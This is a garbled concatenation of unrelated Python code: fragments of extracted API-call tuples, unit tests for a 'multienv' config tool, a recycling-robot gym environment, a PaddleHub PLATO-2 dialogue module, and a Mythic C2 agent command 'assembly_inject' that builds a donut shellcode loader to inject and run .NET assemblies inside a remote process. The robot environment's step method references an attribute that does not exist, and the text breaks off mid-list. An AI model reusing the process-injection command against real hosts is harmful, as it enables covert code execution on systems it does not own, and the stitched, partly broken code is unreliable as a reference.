(['lr'], {'lambda_': '(1000000)'}), '(lr, lambda_=1000000)\n', (2002, 2023), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((2188, 2222), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (2205, 2222), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((2349, 2366), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (2363, 2366), 
True, 'import numpy as np\n'), ((2428, 2446), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2444, 2446), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((2476, 2510), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (2493, 2510), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((2591, 2626), 'numpy.all', 'np.all', (['(model.coef_.shape == (2, 5))'], {}), '(model.coef_.shape == (2, 5))\n', (2597, 2626), True, 'import numpy as np\n'), ((2638, 2676), 'numpy.all', 'np.all', (['(model.intercept_.shape == (2,))'], {}), '(model.intercept_.shape == (2,))\n', (2644, 2676), True, 'import numpy as np\n'), ((2754, 2771), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (2768, 2771), True, 'import numpy as np\n'), ((2781, 2804), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (2796, 2804), True, 'import numpy as np\n'), ((2814, 2837), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (2829, 2837), True, 'import numpy as np\n'), ((2847, 2867), 'numpy.random.randn', 'np.random.randn', (['(100)'], {}), '(100)\n', (2862, 2867), True, 'import numpy as np\n'), ((2877, 2897), 'numpy.random.randn', 'np.random.randn', (['(100)'], {}), '(100)\n', (2892, 2897), True, 'import numpy as np\n'), ((2907, 2925), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (2923, 2925), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((2957, 2991), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (2974, 2991), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((3351, 3368), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (3365, 3368), True, 
'import numpy as np\n'), ((3378, 3428), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""', 'solver': '"""lbfgs"""'}), "(penalty='none', solver='lbfgs')\n", (3396, 3428), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((3468, 3500), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(0)'}), '(lr, lambda_=0)\n', (3485, 3500), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((3612, 3652), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(100000000)'}), '(lr, lambda_=100000000)\n', (3629, 3652), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((3911, 3945), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(1.2)'}), '(lr, lambda_=1.2)\n', (3928, 3945), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((4087, 4104), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (4101, 4104), True, 'import numpy as np\n'), ((4113, 4136), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (4128, 4136), True, 'import numpy as np\n'), ((4229, 4279), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""', 'solver': '"""lbfgs"""'}), "(penalty='none', solver='lbfgs')\n", (4247, 4279), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((4309, 4343), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (4326, 4343), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((4420, 4455), 'numpy.all', 'np.all', (['(model.coef_.shape == (3, 5))'], {}), '(model.coef_.shape == (3, 5))\n', (4426, 4455), True, 'import numpy as 
np\n'), ((4467, 4505), 'numpy.all', 'np.all', (['(model.intercept_.shape == (3,))'], {}), '(model.intercept_.shape == (3,))\n', (4473, 4505), True, 'import numpy as np\n'), ((4573, 4594), 'tensorflow.random.set_seed', 'tf.random.set_seed', (['(0)'], {}), '(0)\n', (4591, 4594), True, 'import tensorflow as tf\n'), ((4599, 4616), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (4613, 4616), True, 'import numpy as np\n'), ((5385, 5406), 'tensorflow.random.set_seed', 'tf.random.set_seed', (['(0)'], {}), '(0)\n', (5403, 5406), True, 'import tensorflow as tf\n'), ((5411, 5428), 'numpy.random.seed', 'np.random.seed', (['(0)'], {}), '(0)\n', (5425, 5428), True, 'import numpy as np\n'), ((5537, 5581), 'adapt.parameter_based.RegularTransferNN', 'RegularTransferNN', (['network'], {'regularizer': '"""l1"""'}), "(network, regularizer='l1')\n", (5554, 5581), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((5854, 5877), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (5869, 5877), True, 'import numpy as np\n'), ((5887, 5911), 'numpy.random.choice', 'np.random.choice', (['(2)', '(100)'], {}), '(2, 100)\n', (5903, 5911), True, 'import numpy as np\n'), ((5921, 5939), 'sklearn.linear_model.LinearRegression', 'LinearRegression', ([], {}), '()\n', (5937, 5939), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((5971, 6005), 'adapt.parameter_based.RegularTransferLR', 'RegularTransferLR', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (5988, 6005), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((6048, 6060), 'sklearn.base.clone', 'clone', (['model'], {}), '(model)\n', (6053, 6060), False, 'from sklearn.base import clone\n'), ((6162, 6212), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ([], {'penalty': '"""none"""', 'solver': '"""lbfgs"""'}), "(penalty='none', 
solver='lbfgs')\n", (6180, 6212), False, 'from sklearn.linear_model import LinearRegression, LogisticRegression\n'), ((6244, 6278), 'adapt.parameter_based.RegularTransferLC', 'RegularTransferLC', (['lr'], {'lambda_': '(1.0)'}), '(lr, lambda_=1.0)\n', (6261, 6278), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((6321, 6333), 'sklearn.base.clone', 'clone', (['model'], {}), '(model)\n', (6326, 6333), False, 'from sklearn.base import clone\n'), ((1480, 1507), 'numpy.abs', 'np.abs', (['(lr.coef_[0][0] - 10)'], {}), '(lr.coef_[0][0] - 10)\n', (1486, 1507), True, 'import numpy as np\n'), ((1868, 1907), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0] - 0.2)'], {}), '(model.estimator_.coef_[0] - 0.2)\n', (1874, 1907), True, 'import numpy as np\n'), ((2061, 2099), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0] - 10)'], {}), '(model.estimator_.coef_[0] - 10)\n', (2067, 2099), True, 'import numpy as np\n'), ((2115, 2162), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0] - lr.coef_[0])'], {}), '(model.estimator_.coef_[0] - lr.coef_[0])\n', (2121, 2162), True, 'import numpy as np\n'), ((2259, 2296), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0] - 4)'], {}), '(model.estimator_.coef_[0] - 4)\n', (2265, 2296), True, 'import numpy as np\n'), ((2375, 2398), 'numpy.random.randn', 'np.random.randn', (['(100)', '(5)'], {}), '(100, 5)\n', (2390, 2398), True, 'import numpy as np\n'), ((3027, 3052), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (3040, 3052), False, 'import pytest\n'), ((3180, 3205), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (3193, 3205), False, 'import pytest\n'), ((3758, 3811), 'numpy.abs', 'np.abs', (['(model.estimator_.coef_[0][0] - lr.coef_[0][0])'], {}), '(model.estimator_.coef_[0][0] - lr.coef_[0][0])\n', (3764, 3811), True, 'import numpy as np\n'), ((3831, 3885), 'numpy.abs', 'np.abs', (['(model.estimator_.intercept_ - 
lr.intercept_[0])'], {}), '(model.estimator_.intercept_ - lr.intercept_[0])\n', (3837, 3885), True, 'import numpy as np\n'), ((5661, 5686), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (5674, 5686), False, 'import pytest\n'), ((5716, 5760), 'adapt.parameter_based.RegularTransferNN', 'RegularTransferNN', (['network'], {'regularizer': '"""l3"""'}), "(network, regularizer='l3')\n", (5733, 5760), False, 'from adapt.parameter_based import RegularTransferLR, RegularTransferLC, RegularTransferNN\n'), ((627, 647), 'numpy.random.randn', 'np.random.randn', (['(100)'], {}), '(100)\n', (642, 647), True, 'import numpy as np\n'), ((1206, 1227), 'numpy.prod', 'np.prod', (['output_shape'], {}), '(output_shape)\n', (1213, 1227), True, 'import numpy as np\n'), ((1351, 1360), 'tensorflow.keras.optimizers.Adam', 'Adam', (['(0.1)'], {}), '(0.1)\n', (1355, 1360), False, 'from tensorflow.keras.optimizers import Adam\n'), ((3084, 3107), 'numpy.random.randn', 'np.random.randn', (['(100)', '(4)'], {}), '(100, 4)\n', (3099, 3107), True, 'import numpy as np\n'), ((3241, 3264), 'numpy.random.randn', 'np.random.randn', (['(100)', '(2)'], {}), '(100, 2)\n', (3256, 3264), True, 'import numpy as np\n'), ((4774, 4783), 'tensorflow.keras.optimizers.Adam', 'Adam', (['(0.1)'], {}), '(0.1)\n', (4778, 4783), False, 'from tensorflow.keras.optimizers import Adam\n'), ((5122, 5131), 'tensorflow.keras.optimizers.Adam', 'Adam', (['(0.1)'], {}), '(0.1)\n', (5126, 5131), False, 'from tensorflow.keras.optimizers import Adam\n'), ((544, 563), 'numpy.random.randn', 'np.random.randn', (['(50)'], {}), '(50)\n', (559, 563), True, 'import numpy as np\n'), ((573, 592), 'numpy.random.randn', 'np.random.randn', (['(50)'], {}), '(50)\n', (588, 592), True, 'import numpy as np\n')] |
import unittest
from multienv.config import Config
from multienv.env_var import EnvVar
from multienv.exceptions import InvalidYamlFileException, \
EnvVarContainerBuildNotFoundException
class EnvVarTestCase(unittest.TestCase):
    """Exercises EnvVar.get_containers_to_rebuild against the fixture
    configuration files, including invalid and missing configurations."""

    def test_get_containers_to_rebuild_with_existent_env_var(self):
        # PHP_VERSION is declared in the fixture, so its containers are listed.
        cfg = Config(
            env_var_container_build='tests/fixtures/'
                                    'env_var_container_build.yml')
        var = EnvVar('PHP_VERSION', 7.1, cfg)
        self.assertEqual(
            var.get_containers_to_rebuild(),
            ['php-fpm', 'workspace']
        )

    def test_get_containers_to_rebuild_with_not_exists_env_var(self):
        # MYSQL_VERSION is absent from the fixture: nothing to rebuild.
        cfg = Config(
            env_var_container_build='tests/fixtures/'
                                    'env_var_container_build.yml')
        var = EnvVar('MYSQL_VERSION', 5.7, cfg)
        self.assertEqual(var.get_containers_to_rebuild(), [])

    def test_get_containers_to_rebuild_with_invalid_config(self):
        # A malformed YAML configuration must raise InvalidYamlFileException.
        with self.assertRaises(InvalidYamlFileException):
            cfg = Config(
                env_var_container_build='tests/fixtures'
                                        '/invalid_env_var_container_build.yml')
            EnvVar('MYSQL_VERSION', 5.7, cfg).get_containers_to_rebuild()

    def test_get_containers_to_rebuild_with_not_existent_config(self):
        # A missing configuration file must raise
        # EnvVarContainerBuildNotFoundException.
        with self.assertRaises(EnvVarContainerBuildNotFoundException):
            cfg = Config(
                env_var_container_build='not_found/'
                                        'env_var_container_build.yml')
            EnvVar('MYSQL_VERSION', 5.7, cfg).get_containers_to_rebuild()


if __name__ == '__main__':
    unittest.main()
| [
"unittest.main",
"multienv.config.Config",
"multienv.env_var.EnvVar"
] | [((1794, 1809), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1807, 1809), False, 'import unittest\n'), ((318, 394), 'multienv.config.Config', 'Config', ([], {'env_var_container_build': '"""tests/fixtures/env_var_container_build.yml"""'}), "(env_var_container_build='tests/fixtures/env_var_container_build.yml')\n", (324, 394), False, 'from multienv.config import Config\n'), ((465, 499), 'multienv.env_var.EnvVar', 'EnvVar', (['"""PHP_VERSION"""', '(7.1)', 'config'], {}), "('PHP_VERSION', 7.1, config)\n", (471, 499), False, 'from multienv.env_var import EnvVar\n'), ((710, 786), 'multienv.config.Config', 'Config', ([], {'env_var_container_build': '"""tests/fixtures/env_var_container_build.yml"""'}), "(env_var_container_build='tests/fixtures/env_var_container_build.yml')\n", (716, 786), False, 'from multienv.config import Config\n'), ((857, 893), 'multienv.env_var.EnvVar', 'EnvVar', (['"""MYSQL_VERSION"""', '(5.7)', 'config'], {}), "('MYSQL_VERSION', 5.7, config)\n", (863, 893), False, 'from multienv.env_var import EnvVar\n'), ((1106, 1195), 'multienv.config.Config', 'Config', ([], {'env_var_container_build': '"""tests/fixtures/invalid_env_var_container_build.yml"""'}), "(env_var_container_build=\n 'tests/fixtures/invalid_env_var_container_build.yml')\n", (1112, 1195), False, 'from multienv.config import Config\n'), ((1273, 1309), 'multienv.env_var.EnvVar', 'EnvVar', (['"""MYSQL_VERSION"""', '(5.7)', 'config'], {}), "('MYSQL_VERSION', 5.7, config)\n", (1279, 1309), False, 'from multienv.env_var import EnvVar\n'), ((1522, 1593), 'multienv.config.Config', 'Config', ([], {'env_var_container_build': '"""not_found/env_var_container_build.yml"""'}), "(env_var_container_build='not_found/env_var_container_build.yml')\n", (1528, 1593), False, 'from multienv.config import Config\n'), ((1676, 1712), 'multienv.env_var.EnvVar', 'EnvVar', (['"""MYSQL_VERSION"""', '(5.7)', 'config'], {}), "('MYSQL_VERSION', 5.7, config)\n", (1682, 1712), False, 'from multienv.env_var import 
EnvVar\n')] |
from mythic_payloadtype_container.MythicCommandBase import *
import json
from uuid import uuid4
from os import path
from mythic_payloadtype_container.MythicRPC import *
import base64
import donut
class AssemblyInjectArguments(TaskArguments):
    """Arguments for assembly_inject: target PID, assembly name, and the
    (optional) arguments forwarded to that assembly."""

    def __init__(self, command_line):
        super().__init__(command_line)
        self.args = {
            "pid": CommandParameter(name="PID", type=ParameterType.Number, description="Process ID to inject into."),
            "assembly_name": CommandParameter(name="Assembly Name", type=ParameterType.String, description="Name of the assembly to execute."),
            "assembly_arguments": CommandParameter(name="Assembly Arguments", type=ParameterType.String, description="Arguments to pass to the assembly."),
        }

    async def parse_arguments(self):
        """Populate self.args from either a JSON dictionary or a plain
        "<pid> <assembly> [args]" command line.

        Raises:
            Exception: if fewer than two positional arguments are supplied.
        """
        if self.command_line[0] == "{":
            self.load_args_from_json_string(self.command_line)
        else:
            parts = self.command_line.split(" ", maxsplit=2)
            if len(parts) < 2:
                raise Exception("Invalid number of arguments.\n\tUsage: {}".format(AssemblyInjectCommand.help_cmd))
            pid = parts[0]
            assembly_name = parts[1]
            # Everything after the assembly name (if present) is forwarded
            # verbatim. (The original code assigned assembly_args = ""
            # twice; the duplicate is removed here.)
            assembly_args = parts[2] if len(parts) > 2 else ""
            self.args["pid"].value = pid
            self.args["assembly_name"].value = assembly_name
            self.args["assembly_arguments"].value = assembly_args
class AssemblyInjectCommand(CommandBase):
    cmd = "assembly_inject"
    needs_admin = False
    help_cmd = "assembly_inject [pid] [assembly] [args]"
    description = "Inject the unmanaged assembly loader into a remote process. The loader will then execute the .NET binary in the context of the injected process."
    version = 2
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = False
    is_upload_file = False
    is_remove_file = False
    author = "@djhohnstein"
    argument_class = AssemblyInjectArguments
    attackmapping = ["T1055"]

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        """Prepare the loader for this task: wrap ExecuteAssembly.exe in a
        donut PIC keyed to a fresh named-pipe name, register the blob with
        Mythic, and attach its file id to the task arguments.

        Raises:
            Exception: if registering the loader blob with Mythic fails.
        """
        # A unique pipe name lets the agent talk to the injected loader.
        pipe_name = str(uuid4())
        task.args.add_arg("pipe_name", pipe_name)
        exe_path = "/srv/ExecuteAssembly.exe"
        donut_pic = donut.create(file=exe_path, params=task.args.get_arg("pipe_name"))
        file_resp = await MythicRPC().execute("create_file",
                                            task_id=task.id,
                                            file=base64.b64encode(donut_pic).decode(),
                                            delete_after_fetch=True)
        if file_resp.status == MythicStatus.Success:
            task.args.add_arg("loader_stub_id", file_resp.response['agent_file_id'])
        else:
            raise Exception("Failed to register execute-assembly DLL: " + file_resp.error)
        # "arch" is not used by this command; the original also fetched it
        # into an unused local, which has been removed.
        task.args.remove_arg("arch")
        return task

    async def process_response(self, response: AgentResponse):
        """No post-processing of agent responses is required."""
        pass
| [
"base64.b64encode",
"uuid.uuid4"
] | [((2238, 2245), 'uuid.uuid4', 'uuid4', ([], {}), '()\n', (2243, 2245), False, 'from uuid import uuid4\n'), ((2602, 2628), 'base64.b64encode', 'base64.b64encode', (['donutPic'], {}), '(donutPic)\n', (2618, 2628), False, 'import base64\n')] |
'''
Created on 4 Feb 2022
@author: ucacsjj
'''
import random
from enum import Enum
import numpy as np
from gym import Env, spaces
from .robot_states_and_actions import *
# This environment affords a much lower level control of the robot than the
# battery environment. It is partially inspired by the AI Gymn Frozen Lake
# example.
class RecyclingRobotEnvironment(Env):
    """Low-level recycling-robot MDP environment.

    Partially inspired by the AI Gym Frozen Lake example. States are
    battery levels; actions are SEARCH / WAIT / RECHARGE (see
    robot_states_and_actions).
    """

    def __init__(self):
        # The action and observation spaces.
        self.action_space = spaces.Discrete(RobotActions.NUMBER_OF_ACTIONS)
        self.observation_space = spaces.Discrete(RobotBatteryState.NUMBER_OF_STATES)

        # Probability of discharging high => medium
        self._alpha = 0.4
        # Probability of discharging medium => low
        self._beta = 0.1
        # Probability of discharging low => discharged
        self._gamma = 0.1
        # Probability of charging up a level low => medium, medium => high
        self._delta = 0.9

        # Rewards for searching, waiting, recharging and running flat.
        self._r_search = 10
        self._r_wait = 5
        self._r_charge = 0
        self._r_discharged = -20

        # State transition table. The dictionary is keyed by (s, a). Each
        # value is a tuple of the probabilities of ending in
        # (DISCHARGED, LOW, MEDIUM, HIGH), conditioned on s and a.
        # All-zero rows mark states where the action leads nowhere
        # (the DISCHARGED state is absorbing).
        self._state_transition_table = {
            # New state when a=SEARCH
            (RobotBatteryState.HIGH, RobotActions.SEARCH) : \
                (0, self._alpha / 3, 2 * self._alpha / 3, 1 - self._alpha),
            (RobotBatteryState.MEDIUM, RobotActions.SEARCH) : \
                (0, self._beta, 1 - self._beta, 0),
            (RobotBatteryState.LOW, RobotActions.SEARCH) : \
                (self._gamma, 1 - self._gamma, 0 , 0),
            (RobotBatteryState.DISCHARGED, RobotActions.SEARCH) : \
                (0, 0, 0, 0),
            # a = WAIT
            (RobotBatteryState.HIGH, RobotActions.WAIT) : \
                (0, 0, 0, 1),
            (RobotBatteryState.MEDIUM, RobotActions.WAIT) : \
                (0, 0 ,1, 0),
            (RobotBatteryState.LOW, RobotActions.WAIT) : \
                (0, 1, 0, 0),
            (RobotBatteryState.DISCHARGED, RobotActions.WAIT) : \
                (0, 0, 0, 0),
            # a = RECHARGE
            (RobotBatteryState.HIGH, RobotActions.RECHARGE) : \
                (0, 0, 0, 1),
            (RobotBatteryState.MEDIUM, RobotActions.RECHARGE) : \
                (0, 0, 1 - self._delta, self._delta),
            (RobotBatteryState.LOW, RobotActions.RECHARGE) : \
                (0, 1 - self._delta, self._delta, 0),
            (RobotBatteryState.DISCHARGED, RobotActions.RECHARGE) : \
                (0, 0, 0, 0)
            }

        # The rewards. In this case, they are only a function of the
        # actions and not the state.
        self._action_reward_table = {
            RobotActions.SEARCH : self._r_search,
            RobotActions.WAIT: self._r_wait,
            RobotActions.RECHARGE: self._r_charge,
            RobotActions.TERMINATE: self._r_discharged
            }

        # Reset to the initial state.
        self.reset()

    def reset(self):
        """Reset the scenario to the initial (fully charged) state."""
        self._battery_state = RobotBatteryState.HIGH
        # Returning the observation is gym convention and is backward
        # compatible (the original returned None, which callers ignored).
        return self._battery_state

    def initial_value_function(self):
        """Return the initial value function for DP algorithms: zero
        everywhere except the terminal DISCHARGED state."""
        v_initial = np.zeros(RobotBatteryState.NUMBER_OF_STATES)
        v_initial[RobotBatteryState.DISCHARGED] = self._r_discharged
        return v_initial

    def initial_policy(self):
        """Return an initial uniform random policy over the non-terminal
        states. Each tuple is ordered by action index; action 0 (TERMINATE,
        presumably -- confirm against RobotActions) gets zero mass."""
        pi_initial = {
            RobotBatteryState.HIGH: (0, 1/3, 1/3, 1/3),
            RobotBatteryState.MEDIUM: (0, 1/3, 1/3, 1/3),
            RobotBatteryState.LOW: (0, 1/3, 1/3, 1/3)}
        return pi_initial

    def step(self, action):
        """Advance the environment by one step.

        Args:
            action: a RobotActions value.

        Returns:
            (observation, reward, done, info) in the gym convention.
        """
        # From the (s, a) pair, get the appropriate row in the table.
        transition_key = (self._battery_state, action)
        # Sanity check
        assert transition_key in self._state_transition_table
        # p is ordered (DISCHARGED, LOW, MEDIUM, HIGH), matching the table
        # documentation and next_state_and_reward_distribution().
        p = self._state_transition_table[transition_key]
        # Rewards depend only on the action. (Fixes the original code,
        # which read the nonexistent attribute self._reward_table and
        # decoded the probability row as if it were per-state rewards.)
        reward = self._action_reward_table[action]
        # All-zero rows mark absorbing situations (e.g. DISCHARGED):
        # stay put and report the episode as finished.
        if sum(p) == 0:
            return self._battery_state, reward, True, {}
        # Sample the successor state from the categorical distribution p.
        sample = random.random()
        done = False
        if sample < p[0]:
            self._battery_state = RobotBatteryState.DISCHARGED
            # Running flat terminates the episode.
            done = True
        elif sample < p[0] + p[1]:
            self._battery_state = RobotBatteryState.LOW
        elif sample < p[0] + p[1] + p[2]:
            self._battery_state = RobotBatteryState.MEDIUM
        else:
            self._battery_state = RobotBatteryState.HIGH
        return self._battery_state, reward, done, {}

    def next_state_and_reward_distribution(self, state, action):
        """Return the successor states, the reward and the transition
        probabilities for (state, action).

        Returns:
            s_prime: successor states ordered to match p.
            r: the (action-dependent) reward.
            p: tuple of probabilities over s_prime.
        """
        transition_key = (state, action)
        # Sanity check
        assert transition_key in self._state_transition_table
        s_prime = [RobotBatteryState.DISCHARGED, RobotBatteryState.LOW, \
                   RobotBatteryState.MEDIUM, RobotBatteryState.HIGH]
        # Get the state transition probabilities and reward.
        p = self._state_transition_table[transition_key]
        r = self._action_reward_table[action]
        return s_prime, r, p
| [
"random.random",
"numpy.zeros",
"gym.spaces.Discrete"
] | [((457, 504), 'gym.spaces.Discrete', 'spaces.Discrete', (['RobotActions.NUMBER_OF_ACTIONS'], {}), '(RobotActions.NUMBER_OF_ACTIONS)\n', (472, 504), False, 'from gym import Env, spaces\n'), ((547, 598), 'gym.spaces.Discrete', 'spaces.Discrete', (['RobotBatteryState.NUMBER_OF_STATES'], {}), '(RobotBatteryState.NUMBER_OF_STATES)\n', (562, 598), False, 'from gym import Env, spaces\n'), ((3664, 3708), 'numpy.zeros', 'np.zeros', (['RobotBatteryState.NUMBER_OF_STATES'], {}), '(RobotBatteryState.NUMBER_OF_STATES)\n', (3672, 3708), True, 'import numpy as np\n'), ((4706, 4721), 'random.random', 'random.random', ([], {}), '()\n', (4719, 4721), False, 'import random\n')] |
# coding:utf-8
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import os
import json
import sys
import argparse
import contextlib
from collections import namedtuple
import paddle.fluid as fluid
import paddlehub as hub
from paddlehub.module.module import runnable
from paddlehub.module.nlp_module import DataFormatError
from paddlehub.common.logger import logger
from paddlehub.module.module import moduleinfo, serving
import plato2_en_base.models as plato_models
from plato2_en_base.tasks.dialog_generation import DialogGeneration
from plato2_en_base.utils import check_cuda, Timer
from plato2_en_base.utils.args import parse_args
@moduleinfo(
    name="plato2_en_base",
    version="1.0.0",
    summary=
    "A novel pre-training model for dialogue generation, incorporated with latent discrete variables for one-to-many relationship modeling.",
    author="baidu-nlp",
    author_email="",
    type="nlp/text_generation",
)
class Plato(hub.NLPPredictionModule):
    def _initialize(self):
        """
        Initialize with the necessary elements.
        """
        # GPU is required; fail fast if no device was selected.
        if "CUDA_VISIBLE_DEVICES" not in os.environ:
            raise RuntimeError("The module only support GPU. Please set the environment variable CUDA_VISIBLE_DEVICES.")
        args = self.setup_args()
        self.task = DialogGeneration(args)
        self.model = plato_models.create_model(args, fluid.CUDAPlace(0))
        # Lightweight record type fed to the reader: raw text plus an id.
        self.Example = namedtuple("Example", ["src", "data_id"])
        self._interactive_mode = False

    def setup_args(self):
        """
        Setup arguments for the underlying PLATO-2 model and task.
        """
        assets_path = os.path.join(self.directory, "assets")
        vocab_path = os.path.join(assets_path, "vocab.txt")
        init_pretraining_params = os.path.join(assets_path, "24L", "Plato")
        spm_model_file = os.path.join(assets_path, "spm.model")
        nsp_inference_model_path = os.path.join(assets_path, "24L", "NSP")
        config_path = os.path.join(assets_path, "24L.json")
        # ArgumentParser.parse_args use argv[1:], it will drop the first one arg, so the first one in sys.argv should be ""
        sys.argv = [
            "", "--model", "Plato", "--vocab_path",
            "%s" % vocab_path, "--do_lower_case", "False", "--init_pretraining_params",
            "%s" % init_pretraining_params, "--spm_model_file",
            "%s" % spm_model_file, "--nsp_inference_model_path",
            "%s" % nsp_inference_model_path, "--ranking_score", "nsp_score", "--do_generation", "True", "--batch_size",
            "1", "--config_path",
            "%s" % config_path
        ]
        parser = argparse.ArgumentParser()
        plato_models.add_cmdline_args(parser)
        DialogGeneration.add_cmdline_args(parser)
        args = parse_args(parser)
        args.load(args.config_path, "Model")
        args.run_infer = True  # only build infer program
        return args

    @serving
    def generate(self, texts):
        """
        Get the robot responses of the input texts.
        Args:
             texts(list or str): If not in the interactive mode, texts should be a list in which every element is the chat context separated with '\t'.
                                 Otherwise, texts shoule be one sentence. The module can get the context automatically.
        Returns:
             results(list): the robot responses.
        """
        if not texts:
            return []
        if self._interactive_mode:
            if isinstance(texts, str):
                # Append the new utterance and rebuild the rolling context.
                self.context.append(texts.strip())
                texts = [" [SEP] ".join(self.context[-self.max_turn:])]
            else:
                raise ValueError("In the interactive mode, the input data should be a string.")
        elif not isinstance(texts, list):
            raise ValueError("If not in the interactive mode, the input data should be a list.")
        bot_responses = []
        for i, text in enumerate(texts):
            # The reader expects turns separated by " [SEP] ".
            example = self.Example(src=text.replace("\t", " [SEP] "), data_id=i)
            record = self.task.reader._convert_example_to_record(example, is_infer=True)
            data = self.task.reader._pad_batch_records([record], is_infer=True)
            pred = self.task.infer_step(self.model, data)[0]  # batch_size is 1
            bot_response = pred["response"]  # ignore data_id and score
            bot_responses.append(bot_response)
        if self._interactive_mode:
            # Remember the bot's reply so the next turn sees it as context.
            self.context.append(bot_responses[0].strip())
        return bot_responses

    @contextlib.contextmanager
    def interactive_mode(self, max_turn=6):
        """
        Enter the interactive mode.
        Args:
            max_turn(int): the max dialogue turns. max_turn = 1 means the robot can only remember the last one utterance you have said.
        """
        self._interactive_mode = True
        self.max_turn = max_turn
        self.context = []
        yield
        # Leaving the context manager discards the conversation history.
        self.context = []
        self._interactive_mode = False

    @runnable
    def run_cmd(self, argvs):
        """
        Run as a command.
        """
        self.parser = argparse.ArgumentParser(
            description='Run the %s module.' % self.name,
            prog='hub run %s' % self.name,
            usage='%(prog)s',
            add_help=True)
        self.arg_input_group = self.parser.add_argument_group(title="Input options", description="Input data. Required")
        self.arg_config_group = self.parser.add_argument_group(
            title="Config options", description="Run configuration for controlling module behavior, optional.")
        self.add_module_input_arg()
        args = self.parser.parse_args(argvs)
        try:
            input_data = self.check_input_data(args)
        # BUG FIX: "except DataFormatError and RuntimeError" evaluated to
        # "except RuntimeError" only (the `and` of two truthy classes is the
        # second class); a tuple catches both exception types.
        except (DataFormatError, RuntimeError):
            self.parser.print_help()
            return None
        results = self.generate(texts=input_data)
        return results
if __name__ == "__main__":
    # Manual smoke test of the module.
    module = Plato()
    # Batch mode: each list element is one full dialogue context, with the
    # turns separated by '\t' (see Plato.generate).
    for result in module.generate(["Hello", "Hello\thi, nice to meet you, my name is tom\tso your name is tom?"]):
        print(result)
    # Interactive mode: the module keeps up to the last 3 turns of context
    # itself; this loop runs until interrupted.
    with module.interactive_mode(max_turn=3):
        while True:
            human_utterance = input()
            robot_utterance = module.generate(human_utterance)
            print("Robot: %s" % robot_utterance[0])
| [
"collections.namedtuple",
"plato2_en_base.tasks.dialog_generation.DialogGeneration",
"paddlehub.module.module.moduleinfo",
"argparse.ArgumentParser",
"plato2_en_base.models.add_cmdline_args",
"os.path.join",
"plato2_en_base.tasks.dialog_generation.DialogGeneration.add_cmdline_args",
